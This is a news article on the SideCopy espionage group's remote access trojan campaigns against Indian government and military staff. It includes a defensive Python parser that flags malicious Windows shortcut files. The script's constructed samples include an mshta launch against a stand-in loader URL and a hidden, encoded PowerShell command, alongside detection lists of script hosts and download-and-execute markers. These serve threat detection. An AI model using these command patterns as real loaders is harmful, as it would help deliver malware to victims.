A cyber-espionage group by the name of SideCopy has reportedly increased its activities targeting Indian government and military personnel. These activities are said to be part of a broader campaign to infect victims with as many as four custom-made Remote Access Trojans (RATs), indicating a marked expansion of the group’s development effort. The group is regularly attributed with such espionage operations, and these intrusions normally conclude with the deployment of a range of modular plugins such as keyloggers, file enumerators and browser credential stealers.
In a report by Cisco Talos, one of the largest commercial threat intelligence teams in the world, researchers note an expansion in SideCopy’s malware campaigns. According to Talos, the group’s infection chains have traditionally used malicious LNK files (Windows shortcut files that run a command or program when the user opens them) and documents to distribute ‘CetaRAT’, its staple C#-based RAT. The group also relies heavily on ‘Allakore RAT’, a publicly available RAT written in the Delphi programming language.
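Because the delivery mechanism above is a shortcut file rather than an executable, the first thing a triage script looks at is what the shortcut actually launches and with which arguments. The following is an added example, not code from the article or from Cisco Talos: a small parser for the Windows Shell Link (.lnk) format that extracts the target path and command-line arguments, plus a simple heuristic that flags shortcuts pointing at a script host (mshta, cmd, powershell and the like) with a URL or an encoded command in the arguments. The sample shortcut bytes are constructed in the script; the paths, the URL and the encoded string in them are placeholders, not indicators from the campaign.

```python
import struct

# Constants from the Windows Shell Link (.lnk) binary format (MS-SHLLINK).
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000C000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData entries appear in this fixed order, each guarded by its LinkFlags bit.
STRING_DATA = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)

# Script hosts and LOLBins that a document-themed shortcut has no business launching.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe"}
# Argument fragments typical of download-and-execute or hidden, encoded commands.
ARG_MARKERS = ("http://", "https://", "-enc", "-w hidden", "-windowstyle hidden",
               "iex", "invoke-expression", "downloadstring")


def build_lnk(relative_path, arguments, unicode=True):
    """Construct a minimal .lnk: header plus RELATIVE_PATH and COMMAND_LINE_ARGUMENTS."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | (IS_UNICODE if unicode else 0)
    header = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags)
    header += b"\x00" * (LNK_HEADER_SIZE - len(header))  # attributes, timestamps etc. zeroed

    def string_data(s):
        encoded = s.encode("utf-16-le") if unicode else s.encode("cp1252")
        return struct.pack("<H", len(s)) + encoded  # CountCharacters, then the characters

    return header + string_data(relative_path) + string_data(arguments)


def _read_u16(data, pos):
    if pos + 2 > len(data):
        raise ValueError("truncated file")
    return struct.unpack_from("<H", data, pos)[0]


def _read_u32(data, pos):
    if pos + 4 > len(data):
        raise ValueError("truncated file")
    return struct.unpack_from("<I", data, pos)[0]


def parse_lnk(data):
    """Return the StringData fields of a .lnk as a dict; raises ValueError on malformed input."""
    if (len(data) < LNK_HEADER_SIZE or data[:4] != struct.pack("<I", LNK_HEADER_SIZE)
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = LNK_HEADER_SIZE
    # Skip the optional variable-length structures that precede StringData.
    if flags & HAS_LINK_TARGET_ID_LIST:
        pos += 2 + _read_u16(data, pos)  # IDListSize field plus the IDList itself
    if flags & HAS_LINK_INFO:
        pos += _read_u32(data, pos)      # LinkInfoSize counts itself
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for bit, name in STRING_DATA:
        if not flags & bit:
            continue
        count = _read_u16(data, pos)
        pos += 2
        nbytes = count * 2 if unicode else count
        raw = data[pos:pos + nbytes]
        if len(raw) != nbytes:
            raise ValueError(f"truncated {name} string")
        fields[name] = raw.decode("utf-16-le" if unicode else "cp1252")
        pos += nbytes
    return fields


def classify_lnk(data):
    """Flag a shortcut whose target is a script host or whose arguments look like a loader."""
    fields = parse_lnk(data)
    target = fields.get("relative_path", "").replace("/", "\\").rsplit("\\", 1)[-1].lower()
    args = fields.get("arguments", "").lower()
    reasons = []
    if target in SCRIPT_HOSTS:
        reasons.append(f"target is script host {target}")
    reasons += [f"argument contains {m!r}" for m in ARG_MARKERS if m in args]
    return {"target": target, "arguments": fields.get("arguments", ""),
            "suspicious": bool(reasons), "reasons": reasons}


# Constructed samples (placeholder paths and URL, not indicators from any real campaign).
BENIGN_LNK = build_lnk(r"..\..\Windows\System32\notepad.exe", r"C:\Users\analyst\notes.txt")
MSHTA_LNK = build_lnk(r"..\..\Windows\System32\mshta.exe", "https://loader.invalid/stage.hta")
ANSI_CMD_LNK = build_lnk(r"..\..\Windows\System32\cmd.exe",
                         "/c powershell -w hidden -enc SQBFAFgA", unicode=False)

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_LNK), ("mshta", MSHTA_LNK), ("ansi-cmd", ANSI_CMD_LNK)):
        print(label, classify_lnk(blob))
```

The parser deliberately walks the optional LinkTargetIDList and LinkInfo blocks by their declared sizes rather than trusting fixed offsets, because real shortcuts almost always carry both; a sample that fails the header check or runs out of bytes mid-string is reported as malformed rather than silently scored as benign. The heuristic is a starting point for triage, not a verdict: a shortcut that launches a script host is normal on an administrator's desktop and abnormal inside an e-mailed archive, so the context in which the file arrived still has to be weighed.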
The origin of SideCopy
An Advanced Persistent Threat (APT) is the term used for a cyber-attack campaign in which an intruder gains unauthorised access to a network and establishes a long-term presence on it in order to harvest sensitive and confidential data. SideCopy is one such APT, and it has been targeting the Indian government and military since 2019.
The group’s operations were first spotted by the threat intelligence team at the cybersecurity firm Quick Heal, and published on its Seqrite blog in September 2020.
“Quick Heal’s threat intelligence team recently uncovered evidence of an advanced persistent threat (APT) against Indian defence forces. Our analysis shows that many old campaigns and attacks in the past year relate to ‘Operation SideCopy’ by common IOCs.”
Kaplesh Mantri, author of the Seqrite article on Operation SideCopy
According to Quick Heal, the operation has targeted only the Indian government and defence personnel. The malware modules are updated after each round of reconnaissance and appear to be under constant development. Based on the pattern of the attacks, Quick Heal suspected that SideCopy was linked to another well-known APT group, Transparent Tribe (aka APT36 or Mythic Leopard), which has previously been associated with Pakistan.
Transparent Tribe has itself been linked to several earlier attacks on the Indian government and military, but has reportedly shifted its attention to Afghanistan. SideCopy is also said to have a history of mimicking the infection chains of another well-known APT, SideWinder, in order to mislead analysts and security personnel.
Cyberattacks on Indians
According to figures released by the Ministry of Electronics and Information Technology (MeitY), the Indian Computer Emergency Response Team (CERT-In) recorded over 1.4 million cybersecurity incidents in the five-year period from 2015 to 2020. In 2015 CERT-In recorded 49,455 incidents; in 2020 it documented 696,938. MeitY released these figures in response to questions about the growing threat of cyberattacks on Indian citizens and on Indian commercial and legal entities.
Another worrying statistic comes from the 2019 Internet Crime Report published by the Internet Crime Complaint Center (IC3), a division of the US Federal Bureau of Investigation (FBI). The report ranks India third among the top 20 countries by number of cybercrime victims.
“With the proliferation in the internet and mobile phone usage, there is a rise in the number of cybersecurity incidents in the country as well as globally. Proactive tracking by CERT-In including its Cyber Swachhta Kendra and National Cyber Coordination Centre (NCCC) and improved cybersecurity awareness among individuals and organizations across sectors has led to increased reporting of incidents.”
VK Saraswat, in his NITI Aayog report
Cisco Talos has also released a detailed report on SideCopy, which suggests that the group brings nothing new to the table: cyber-espionage between India and Pakistan has been well documented over the last decade, and the two countries are known to keep tabs on each other.